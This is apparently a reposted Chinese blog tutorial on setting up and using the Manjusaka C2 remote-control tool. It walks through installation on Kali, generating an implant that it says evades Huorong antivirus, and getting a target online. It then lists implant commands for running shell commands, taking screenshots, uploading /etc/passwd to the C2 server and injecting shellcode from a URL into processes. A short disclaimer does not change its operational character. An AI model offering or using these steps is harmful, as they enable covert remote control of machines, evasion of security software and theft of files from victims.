本文为大家推荐一款基于web界面的c2工具。
让我们一起来学习吧!
系统架构
地址
https://github.com/YDHCUI/manjusaka
在kali中安装
首先我们克隆项目地址到我们kali的本地环境。
git clone https://github.com/YDHCUI/manjusaka.git
chmod -R 777 manjusaka
#运行
./manjusaka
账号密码见初始日志,每个人生成的密码及默认路由都不一样。
然后,我们浏览器中访问http://ip:3200/manjusaka,便可以看到下面登录界面。则说明安装成功。
接下来,我们根据终端中提供的信息进行登录系统。
新建项目
创建项目,默认有一个公共项目,通过项目【状态】开关可以控制项目是否启用状态。选择当前项目后 可在回传结果里面查看当前项目回传的信息。当然,我们可以自己创建自己的项目,具体做法如下:点击全局设置
-目标设置
-新建项目
这里我们是内网环境,因此只填kali的IP地址。如果是公网服务器,可以填写公网IP。
生成shell
点击生成npc
点击下载生成的shell
对其进行木马查杀,完美过火绒。
运行后,目标成功上线。
填坑 默认监听80
端口,建议在conf.toml
文件中修改为其他端口。因为80端口早被其他应用如nginx
占用。
点击激活,可在npc详情中显示相应的信息。
虚拟终端
常用的终端命令
help 打印帮助
ps 查看进程 eg: ps
ss 查看网络连接 eg: ss
ls 枚举文件 eg: ls /
cd 切换目录 eg: cd /
sh 执行系统命令 eg: sh ps -aux , sh tasklist
cat 读取文本 cat a.txt
screen 执行截屏 screen
wget 下载文件 eg: wget http://192.168.1.1/a.txt <a.txt> 文件名可选 默认当前
put 上传文件 eg: put /etc/passwd 将passwd文件上传到nps服务器
start 执行插件可执行文件 eg: start name <args> 需要可执行文件在plugins目录下 会自动把插件传到目标机器上面
pl 执行插件 eg: pl plugname <plugargs> 需要插件在plugins目录下
inject 注入进程 eg: inject pid <shellcodeurl> shellcodeurl可选 默认下载当前shellcode下载链接
文件管理
为了更好的展示,我们还可以通过流程图的形式进行展示。
总结
manjusaka工具是一款很棒的C2工具。尤其是在免杀这块,因为很多初学者在利用cs或者msf生成shell时,最头疼的问题也莫过于免杀了。同时manjusaka也支持自定义开发插件,灵活性也大大提高。
原文始发于微信公众号(kali笔记):一款基于Web界面的C2远控工具Manjusaka
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论